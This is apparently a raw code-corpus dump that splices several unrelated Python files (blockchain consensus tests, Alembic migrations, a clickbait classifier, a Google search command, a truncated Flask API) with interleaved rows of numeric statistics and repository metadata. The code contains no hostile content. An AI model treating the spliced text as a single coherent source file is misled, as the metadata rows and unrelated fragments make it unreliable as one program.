# Shashank M: So So the first one, the document passing test cases are all done so the other one which was to add the generated intense and responses for that. We were facing a few issues. So with its help you were able to just you know just get the edge cases out. So if it's failing we're giving the particular the necessary output messages. So yeah, that's all done.
# Ashwin Swarup: All right. Sounds good. Thanks a lot, guys.
# """
preprocess_raw(text)
| 61.411765 | 614 | 0.717625 | 921 | 5,220 | 3.997828 | 0.346363 | 0.026073 | 0.017653 | 0.008691 | 0.066812 | 0.043998 | 0.043998 | 0.034221 | 0.034221 | 0.034221 | 0 | 0.004042 | 0.194253 | 5,220 | 84 | 615 | 62.142857 | 0.871374 | 0.622605 | 0 | 0.043478 | 0 | 0.021739 | 0.198767 | 0.07396 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.108696 | 0 | 0.130435 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb46960a624b1fcc9ef41fe1b43cb6eb44c59062 | 14,165 | py | Python | src/bos_consensus/blockchain/test_blockchain.py | LuffyEMonkey/isaac-consensus-protocol | 806d967d56ef8862a477b2515c7854af289c10a0 | [
"Apache-2.0"
] | 1 | 2018-04-10T11:00:59.000Z | 2018-04-10T11:00:59.000Z | src/bos_consensus/blockchain/test_blockchain.py | LuffyEMonkey/isaac-consensus-protocol | 806d967d56ef8862a477b2515c7854af289c10a0 | [
"Apache-2.0"
] | null | null | null | src/bos_consensus/blockchain/test_blockchain.py | LuffyEMonkey/isaac-consensus-protocol | 806d967d56ef8862a477b2515c7854af289c10a0 | [
"Apache-2.0"
] | null | null | null | from ..common import Ballot, BallotVotingResult, Message, node_factory
from ..network import Endpoint
from ..blockchain import Blockchain
from ..consensus import get_fba_module
from ..consensus.fba.isaac import IsaacState
from .util import StubTransport
IsaacConsensus = get_fba_module('isaac').IsaacConsensus
def blockchain_factory(name, address, threshold, validator_endpoint_uris):
node = node_factory(name, Endpoint.from_uri(address))
validators = list()
for uri in validator_endpoint_uris:
validators.append(
node_factory(uri, Endpoint.from_uri(uri)),
)
consensus = IsaacConsensus(node, threshold, validators)
return Blockchain(
consensus,
StubTransport()
)
def test_consensus_instantiation():
blockchain = blockchain_factory(
'n1',
'http://localhost:5001',
100,
['http://localhost:5002', 'http://localhost:5003'])
assert blockchain.node_name == 'n1'
assert blockchain.endpoint.uri_full == 'http://localhost:5001?name=n1'
assert blockchain.consensus.threshold == 100
IsaacConsensus.transport = StubTransport()
def test_state_init_to_sign():
node_name_1 = 'http://localhost:5001'
node_name_2 = 'http://localhost:5002'
node_name_3 = 'http://localhost:5003'
bc1 = blockchain_factory(
node_name_1,
'http://localhost:5001',
100,
[node_name_2, node_name_3]
)
bc2 = blockchain_factory(
node_name_2,
'http://localhost:5002',
100,
[node_name_1, node_name_3]
)
bc3 = blockchain_factory(
node_name_3,
'http://localhost:5003',
100,
[node_name_1, node_name_2]
)
bc1.consensus.add_to_validator_connected(bc2.node)
bc1.consensus.add_to_validator_connected(bc3.node)
bc1.consensus.init()
message = Message.new('message')
ballot_init_1 = Ballot.new(node_name_1, message, IsaacState.INIT, BallotVotingResult.agree)
ballot_id = ballot_init_1.ballot_id
ballot_init_2 = Ballot(ballot_id, node_name_2, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_1.timestamp)
bc1.receive_ballot(ballot_init_1)
bc1.receive_ballot(ballot_init_2)
bc1.receive_ballot(ballot_init_3)
assert bc1.consensus.slot.get_ballot_state(ballot_init_1) == IsaacState.SIGN
def test_state_init_to_all_confirm_sequence():
node_name_1 = 'http://localhost:5001'
node_name_2 = 'http://localhost:5002'
node_name_3 = 'http://localhost:5003'
bc1 = blockchain_factory(
node_name_1,
'http://localhost:5001',
100,
[node_name_2, node_name_3],
)
bc2 = blockchain_factory(
node_name_2,
'http://localhost:5002',
100,
[node_name_1, node_name_3],
)
bc3 = blockchain_factory(
node_name_3,
'http://localhost:5003',
100,
[node_name_1, node_name_2],
)
bc1.consensus.add_to_validator_connected(bc2.node)
bc1.consensus.add_to_validator_connected(bc3.node)
bc1.consensus.init()
bc2.consensus.add_to_validator_connected(bc1.node)
bc2.consensus.add_to_validator_connected(bc3.node)
bc2.consensus.init()
bc3.consensus.add_to_validator_connected(bc1.node)
bc3.consensus.add_to_validator_connected(bc2.node)
bc3.consensus.init()
message = Message.new('message')
ballot_init_1 = Ballot.new(node_name_1, message, IsaacState.INIT, BallotVotingResult.agree)
ballot_id = ballot_init_1.ballot_id
ballot_init_2 = Ballot(ballot_id, node_name_2, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_1.timestamp)
bc1.receive_ballot(ballot_init_1)
bc1.receive_ballot(ballot_init_2)
bc1.receive_ballot(ballot_init_3)
bc2.receive_ballot(ballot_init_1)
bc2.receive_ballot(ballot_init_2)
bc2.receive_ballot(ballot_init_3)
bc3.receive_ballot(ballot_init_1)
bc3.receive_ballot(ballot_init_2)
bc3.receive_ballot(ballot_init_3)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
assert bc3.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
ballot_sign_1 = Ballot(ballot_id, node_name_1, message, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_sign_2 = Ballot(ballot_id, node_name_2, message, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_sign_3 = Ballot(ballot_id, node_name_3, message, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_1.timestamp)
bc1.receive_ballot(ballot_sign_1)
bc1.receive_ballot(ballot_sign_2)
bc1.receive_ballot(ballot_sign_3)
bc2.receive_ballot(ballot_sign_1)
bc2.receive_ballot(ballot_sign_2)
bc2.receive_ballot(ballot_sign_3)
bc3.receive_ballot(ballot_sign_1)
bc3.receive_ballot(ballot_sign_2)
bc3.receive_ballot(ballot_sign_3)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
assert bc3.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
ballot_accept_1 = Ballot(ballot_id, node_name_1, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_accept_2 = Ballot(ballot_id, node_name_2, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_1.timestamp)
ballot_accept_3 = Ballot(ballot_id, node_name_3, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_1.timestamp)
bc1.receive_ballot(ballot_sign_1) # different state ballot
bc1.receive_ballot(ballot_accept_2)
bc1.receive_ballot(ballot_accept_3)
bc2.receive_ballot(ballot_accept_1)
bc2.receive_ballot(ballot_accept_2)
bc2.receive_ballot(ballot_sign_3) # different state ballot
bc3.receive_ballot(ballot_accept_1)
bc3.receive_ballot(ballot_accept_2)
bc3.receive_ballot(ballot_accept_3)
assert message in bc1.consensus.messages
assert bc2.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
assert message in bc3.consensus.messages
def test_state_jump_from_init():
node_name_1 = 'http://localhost:5001'
node_name_2 = 'http://localhost:5002'
node_name_3 = 'http://localhost:5003'
node_name_4 = 'http://localhost:5004'
bc1 = blockchain_factory(
node_name_1,
'http://localhost:5001',
100,
[node_name_2, node_name_3, node_name_4],
)
bc2 = blockchain_factory(
node_name_2,
'http://localhost:5002',
100,
[node_name_1, node_name_3, node_name_4],
)
bc3 = blockchain_factory(
node_name_3,
'http://localhost:5003',
100,
[node_name_1, node_name_2, node_name_4],
)
bc4 = blockchain_factory(
node_name_4,
'http://localhost:5004',
100,
[node_name_1, node_name_2, node_name_3],
)
bc1.consensus.add_to_validator_connected(bc2.node)
bc1.consensus.add_to_validator_connected(bc3.node)
bc1.consensus.add_to_validator_connected(bc4.node)
bc1.consensus.init()
message = Message.new('message')
ballot_init_2 = Ballot.new(node_name_2, message, IsaacState.INIT, BallotVotingResult.agree)
ballot_id = ballot_init_2.ballot_id
ballot_init_3 = Ballot(ballot_id, node_name_3, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_init_4 = Ballot(ballot_id, node_name_4, message, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_init_2)
bc1.receive_ballot(ballot_init_3)
bc1.receive_ballot(ballot_init_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
ballot_sign_2 = Ballot(ballot_id, node_name_2, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_sign_3 = Ballot(ballot_id, node_name_3, message, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_sign_4 = Ballot(ballot_id, node_name_4, message, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_sign_2)
bc1.receive_ballot(ballot_sign_3)
bc1.receive_ballot(ballot_sign_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
ballot_accept_3 = Ballot(ballot_id, node_name_3, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_accept_4 = Ballot(ballot_id, node_name_4, message, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_accept_3)
bc1.receive_ballot(ballot_accept_4)
assert message in bc1.consensus.messages
def test_next_message():
node_name_1 = 'http://localhost:5001'
node_name_2 = 'http://localhost:5002'
node_name_3 = 'http://localhost:5003'
node_name_4 = 'http://localhost:5004'
bc1 = blockchain_factory(
node_name_1,
'http://localhost:5001',
100,
[node_name_2, node_name_3, node_name_4],
)
bc2 = blockchain_factory(
node_name_2,
'http://localhost:5002',
100,
[node_name_1, node_name_3, node_name_4],
)
bc3 = blockchain_factory(
node_name_3,
'http://localhost:5003',
100,
[node_name_1, node_name_2, node_name_4],
)
bc4 = blockchain_factory(
node_name_4,
'http://localhost:5004',
100,
[node_name_1, node_name_2, node_name_3],
)
bc1.consensus.add_to_validator_connected(bc2.node)
bc1.consensus.add_to_validator_connected(bc3.node)
bc1.consensus.add_to_validator_connected(bc4.node)
bc1.consensus.init()
message_1 = Message.new('message-1')
ballot_init_2 = Ballot.new(node_name_2, message_1, IsaacState.INIT, BallotVotingResult.agree)
ballot_id = ballot_init_2.ballot_id
ballot_init_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_init_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.INIT, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_init_2)
bc1.receive_ballot(ballot_init_3)
bc1.receive_ballot(ballot_init_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
ballot_sign_2 = Ballot(ballot_id, node_name_2, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_sign_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_sign_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.SIGN, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_sign_2)
bc1.receive_ballot(ballot_sign_3)
bc1.receive_ballot(ballot_sign_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
ballot_accept_3 = Ballot(ballot_id, node_name_3, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
ballot_accept_4 = Ballot(ballot_id, node_name_4, message_1, IsaacState.ACCEPT, BallotVotingResult.agree,
ballot_init_2.timestamp)
bc1.receive_ballot(ballot_accept_3)
bc1.receive_ballot(ballot_accept_4)
assert message_1 in bc1.consensus.messages
message_2 = Message.new('message-2')
ballot_init_2 = Ballot.new(node_name_2, message_2, IsaacState.INIT, BallotVotingResult.agree)
ballot_id_2 = ballot_init_2.ballot_id
ballot_init_2.ballot_id = ballot_id_2
ballot_init_3.ballot_id = ballot_id_2
ballot_init_4.ballot_id = ballot_id_2
ballot_init_2.timestamp = ballot_init_2.timestamp
ballot_init_3.timestamp = ballot_init_2.timestamp
ballot_init_4.timestamp = ballot_init_2.timestamp
ballot_init_2.message = message_2
ballot_init_3.message = message_2
ballot_init_4.message = message_2
bc1.receive_ballot(ballot_init_2)
bc1.receive_ballot(ballot_init_3)
bc1.receive_ballot(ballot_init_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.SIGN
ballot_sign_2.ballot_id = ballot_id_2
ballot_sign_3.ballot_id = ballot_id_2
ballot_sign_4.ballot_id = ballot_id_2
ballot_sign_2.timestamp = ballot_init_2.timestamp
ballot_sign_3.timestamp = ballot_init_2.timestamp
ballot_sign_4.timestamp = ballot_init_2.timestamp
ballot_sign_2.message = message_2
ballot_sign_3.message = message_2
ballot_sign_4.message = message_2
bc1.receive_ballot(ballot_sign_2)
bc1.receive_ballot(ballot_sign_3)
bc1.receive_ballot(ballot_sign_4)
assert bc1.consensus.slot.get_ballot_state(ballot_init_2) == IsaacState.ACCEPT
ballot_accept_3.ballot_id = ballot_id_2
ballot_accept_4.ballot_id = ballot_id_2
ballot_accept_3.message = message_2
ballot_accept_4.message = message_2
ballot_accept_3.timestamp = ballot_init_2.timestamp
ballot_accept_4.timestamp = ballot_init_2.timestamp
bc1.receive_ballot(ballot_accept_3)
bc1.receive_ballot(ballot_accept_4)
assert message_1 in bc1.consensus.messages
| 35.32419 | 108 | 0.710131 | 1,880 | 14,165 | 4.948936 | 0.039362 | 0.080825 | 0.110275 | 0.085125 | 0.89166 | 0.822979 | 0.806535 | 0.730546 | 0.72356 | 0.707868 | 0 | 0.051588 | 0.202188 | 14,165 | 400 | 109 | 35.4125 | 0.771702 | 0.003177 | 0 | 0.601286 | 0 | 0 | 0.051569 | 0 | 0 | 0 | 0 | 0 | 0.07074 | 1 | 0.019293 | false | 0 | 0.019293 | 0 | 0.041801 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb470997d608e5d11cdde33ab3f008db973fea29 | 780 | py | Python | problems/python/reverse_integer.py | kcc3/leetcode-solutions | 9a38f76c702a6df0f4bc798ac94b7137ae31ea76 | [
"MIT"
] | null | null | null | problems/python/reverse_integer.py | kcc3/leetcode-solutions | 9a38f76c702a6df0f4bc798ac94b7137ae31ea76 | [
"MIT"
] | null | null | null | problems/python/reverse_integer.py | kcc3/leetcode-solutions | 9a38f76c702a6df0f4bc798ac94b7137ae31ea76 | [
"MIT"
] | null | null | null | def reverse(x):
"""Given a 32-bit signed integer, reverse digits of an integer.
Solve:
Cast int to a string and use string slicing to easily do reversing
Args:
x (int): integer to reverse
Returns:
int: reversed integer or 0 if it exceeds the 32-bit signed integer range: [−2^31, 2^31 − 1]
"""
s = str(x)
negative = False
if s[0] == "-":
negative = True
s = s[1:]
s = s[::-1]
if negative:
s = "-" + s
return 0 if int(s) > 2 ** 31 - 1 or int(s) < -2 ** 31 else int(s)
if __name__ == "__main__":
assert reverse(123) == 321
assert reverse(-123) == -321
assert reverse(120) == 21
assert reverse(-120) == -21
assert reverse(2**32) == 0
assert reverse(-2**33) == 0
| 25.16129 | 100 | 0.546154 | 121 | 780 | 3.471074 | 0.429752 | 0.185714 | 0.052381 | 0.085714 | 0.207143 | 0.207143 | 0 | 0 | 0 | 0 | 0 | 0.099065 | 0.314103 | 780 | 30 | 101 | 26 | 0.682243 | 0.365385 | 0 | 0 | 0 | 0 | 0.021739 | 0 | 0 | 0 | 0 | 0 | 0.352941 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb48963dd6288ee9be3650594810acbe8bced547 | 1,466 | py | Python | alembic/versions/3ea865991c72_create_user_notification_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | 1 | 2021-01-03T00:20:07.000Z | 2021-01-03T00:20:07.000Z | alembic/versions/3ea865991c72_create_user_notification_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | null | null | null | alembic/versions/3ea865991c72_create_user_notification_table.py | modist-io/modist-api | 827d4b1962caee9a2fde1470df30d8fd60f8f998 | [
"0BSD"
] | null | null | null | """Create user_notification table.
Revision ID: 3ea865991c72
Revises: 4e8c8d41f23f
Create Date: 2020-04-15 18:43:23.856094
"""
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
from alembic import op
# revision identifiers, used by Alembic.
revision = "3ea865991c72"
down_revision = "4e8c8d41f23f"
branch_labels = None
depends_on = None
def upgrade():
"""Pushes changes into the database."""
op.create_table(
"user_notification",
sa.Column(
"created_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column(
"updated_at",
sa.DateTime(timezone=True),
server_default=sa.text("now()"),
nullable=False,
),
sa.Column("user_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.Column("notification_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.ForeignKeyConstraint(
["notification_id"], ["notification.id"], ondelete="cascade"
),
sa.ForeignKeyConstraint(["user_id"], ["user.id"], ondelete="cascade"),
sa.PrimaryKeyConstraint("user_id", "notification_id"),
)
op.create_refresh_updated_at_trigger("user_notification")
def downgrade():
"""Reverts changes performed by upgrade()."""
op.drop_refresh_updated_at_trigger("user_notification")
op.drop_table("user_notification")
| 27.660377 | 84 | 0.65075 | 161 | 1,466 | 5.73913 | 0.409938 | 0.08658 | 0.064935 | 0.068182 | 0.318182 | 0.318182 | 0.233766 | 0.233766 | 0.233766 | 0.145022 | 0 | 0.045574 | 0.221692 | 1,466 | 52 | 85 | 28.192308 | 0.764242 | 0.159618 | 0 | 0.323529 | 0 | 0 | 0.184514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.088235 | 0 | 0.147059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb48c15a637195ee193c14fecf22f1af1ff953ad | 813 | py | Python | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 2 | 2020-01-04T17:46:20.000Z | 2020-01-19T17:41:38.000Z | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 7 | 2019-05-06T01:42:12.000Z | 2019-05-14T23:22:54.000Z | migrations/versions/0974ecc7059c_protocols_table_add_col_is_cool.py | Spin14/wolf-backend | 21fc9d1a0df092eaa6a533149a165d2898f5fe40 | [
"MIT"
] | 1 | 2019-09-24T21:15:52.000Z | 2019-09-24T21:15:52.000Z | """protocols table: add col is cool
Revision ID: 0974ecc7059c
Revises: a5d44f24dd74
Create Date: 2019-05-12 01:17:23.068006
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '0974ecc7059c'
down_revision = 'a5d44f24dd74'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('protocols', schema=None) as batch_op:
batch_op.add_column(sa.Column('is_cool', sa.Boolean(), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('protocols', schema=None) as batch_op:
batch_op.drop_column('is_cool')
# ### end Alembic commands ###
| 24.636364 | 78 | 0.701107 | 108 | 813 | 5.138889 | 0.5 | 0.05045 | 0.075676 | 0.082883 | 0.353153 | 0.353153 | 0.353153 | 0.353153 | 0.353153 | 0.353153 | 0 | 0.074738 | 0.177122 | 813 | 32 | 79 | 25.40625 | 0.754858 | 0.386224 | 0 | 0.166667 | 0 | 0 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4979a9585e712765aa4115058b93473d1d95ca | 1,225 | py | Python | avalon/__main__.py | noflame/core | 79ea85a26f0296d7c1f72670d377611d4502307b | [
"MIT"
] | 6 | 2018-09-13T04:44:28.000Z | 2020-02-16T22:27:50.000Z | avalon/__main__.py | noflame/core | 79ea85a26f0296d7c1f72670d377611d4502307b | [
"MIT"
] | 23 | 2017-11-14T15:38:32.000Z | 2019-07-25T11:18:42.000Z | avalon/__main__.py | noflame/core | 79ea85a26f0296d7c1f72670d377611d4502307b | [
"MIT"
] | 3 | 2018-02-02T22:11:56.000Z | 2018-09-19T07:40:00.000Z | import argparse
from . import pipeline
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--creator", action="store_true",
help="Launch Instance Creator in standalone mode")
parser.add_argument("--loader", action="store_true",
help="Launch Asset Loader in standalone mode")
parser.add_argument("--manager", action="store_true",
help="Launch Manager in standalone mode")
parser.add_argument("--projectmanager", action="store_true",
help="Launch Manager in standalone mode")
parser.add_argument("--root",
help="Absolute path to root directory of assets")
args, unknown = parser.parse_known_args()
host = pipeline.debug_host()
pipeline.register_host(host)
if args.creator:
from .tools import creator
creator.show(debug=True)
elif args.loader:
from .tools import loader
loader.show(debug=True)
elif args.manager:
from .tools import manager
manager.show(debug=True)
elif args.projectmanager:
from .tools import projectmanager
projectmanager.cli(unknown)
| 32.236842 | 74 | 0.631837 | 134 | 1,225 | 5.619403 | 0.320896 | 0.059761 | 0.112882 | 0.10093 | 0.410359 | 0.260292 | 0.172643 | 0.172643 | 0.172643 | 0.172643 | 0 | 0 | 0.270204 | 1,225 | 37 | 75 | 33.108108 | 0.842282 | 0 | 0 | 0.068966 | 0 | 0 | 0.23102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.206897 | 0 | 0.206897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4a49b8b6d974716033873278cdc931b262790b | 1,607 | py | Python | Codementor.io/GarethDwyer/apps/clickbait/clickbait_classifier.py | nitin-cherian/Webapps | fbfbef6cb22fc742ee66460268afe6ff7834faa1 | [
"MIT"
] | 1 | 2017-11-22T08:56:06.000Z | 2017-11-22T08:56:06.000Z | Codementor.io/GarethDwyer/apps/clickbait/clickbait_classifier.py | nitin-cherian/Webapps | fbfbef6cb22fc742ee66460268afe6ff7834faa1 | [
"MIT"
] | null | null | null | Codementor.io/GarethDwyer/apps/clickbait/clickbait_classifier.py | nitin-cherian/Webapps | fbfbef6cb22fc742ee66460268afe6ff7834faa1 | [
"MIT"
] | null | null | null | # clickbait_classifier.py
# Import libraries
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score
# globals
DATA_SET_FILE = "clickbait.txt"
def is_clicbait(text):
svm, vectorizer = classifier()
# Vectorize the text. Input needs to be an iterable
vector = vectorizer.transform([text])
# Predict using the classifier
prediction = svm.predict(vector)
# if prediction is 1, return True else False
return True if prediction[0] == '1' else False
def load_data(file):
# Load data from dataset into Python lists
with open(file) as f:
lines = [line.strip().split("\t") for line in f]
headlines, labels = zip(*lines)
return headlines, labels
def classifier():
headlines, labels = load_data(DATA_SET_FILE)
# Break dataset into train and test sets
train_headlines = headlines[:8000]
test_headlines = headlines[8000:]
train_labels = labels[:8000]
test_labels = labels[8000:]
# Create a vectorizer and classifier
vectorizer = TfidfVectorizer()
svm = LinearSVC()
# Transform our text data into numerical vectors
train_vector = vectorizer.fit_transform(train_headlines)
# Train the classifier
svm.fit(train_vector, train_labels)
# Test accuracy of our classifier
test_vector = vectorizer.transform(test_headlines)
predictions = svm.predict(test_vector)
print(accuracy_score(predictions, test_labels))
return svm, vectorizer
def main():
classifier()
if __name__ == '__main__':
main()
| 23.289855 | 60 | 0.711886 | 201 | 1,607 | 5.532338 | 0.402985 | 0.029676 | 0.019784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014879 | 0.205352 | 1,607 | 68 | 61 | 23.632353 | 0.855912 | 0.239577 | 0 | 0 | 0 | 0 | 0.019851 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.09375 | 0 | 0.3125 | 0.03125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb4ad73a6351ad5b11f7022c36288870b0aeaaa3 | 1,166 | py | Python | commands/google_search.py | UnityRobbie/bottomly | ae5f1b9c6ee74392a8525a1c0d611927fe0d7cda | [
"MIT"
] | 4 | 2018-03-12T09:16:49.000Z | 2021-07-15T08:21:32.000Z | commands/google_search.py | UnityRobbie/bottomly | ae5f1b9c6ee74392a8525a1c0d611927fe0d7cda | [
"MIT"
] | 5 | 2018-03-17T20:27:31.000Z | 2020-11-17T09:50:48.000Z | commands/google_search.py | UnityRobbie/bottomly | ae5f1b9c6ee74392a8525a1c0d611927fe0d7cda | [
"MIT"
] | 7 | 2018-03-12T10:01:31.000Z | 2022-01-18T14:55:00.000Z | import warnings
from commands.abstract_command import AbstractCommand
from config import ConfigKeys, Config
from googleapiclient.discovery import build
class GoogleSearchCommand(AbstractCommand):
def get_purpose(self):
return "Performs a google search and returns the top hit."
def execute(self, search_term):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
if search_term is None or search_term == '':
return None
service = build("customsearch", "v1", developerKey=self.api_key)
results = service.cse().list(q=search_term, cx=self.cse_id, num=1).execute()
if self._result_set_is_empty(results):
return None
return results['items'][0]
def _result_set_is_empty(self, results):
return results['searchInformation']['totalResults'] == '0'
def __init__(self):
super(GoogleSearchCommand, self)
config = Config()
self.api_key = config.get_config_value(ConfigKeys.google_api_key)
self.cse_id = config.get_config_value(ConfigKeys.google_cse_id)
| 36.4375 | 89 | 0.657804 | 134 | 1,166 | 5.492537 | 0.462687 | 0.054348 | 0.027174 | 0.043478 | 0.097826 | 0.097826 | 0 | 0 | 0 | 0 | 0 | 0.004592 | 0.253002 | 1,166 | 31 | 90 | 37.612903 | 0.840413 | 0 | 0 | 0.083333 | 0 | 0 | 0.09163 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0.083333 | 0.583333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
bb4cb07300adc722e5ea30f3413a6aed3a6f72bd | 2,972 | py | Python | CHIMAclient/client_api.py | ANTLab-polimi/CHIMA | 368602b1555ac46a005b9111446c3a7e0952e72d | [
"Apache-2.0"
] | 1 | 2021-12-16T14:50:50.000Z | 2021-12-16T14:50:50.000Z | CHIMAclient/client_api.py | ANTLab-polimi/CHIMA | 368602b1555ac46a005b9111446c3a7e0952e72d | [
"Apache-2.0"
] | null | null | null | CHIMAclient/client_api.py | ANTLab-polimi/CHIMA | 368602b1555ac46a005b9111446c3a7e0952e72d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
from flask import Flask
from flask import request
from flask import send_file
app = Flask(__name__)
#To suppress Flask's request logs on stdout
import logging
from config import *
from mpls import *
from utils import *
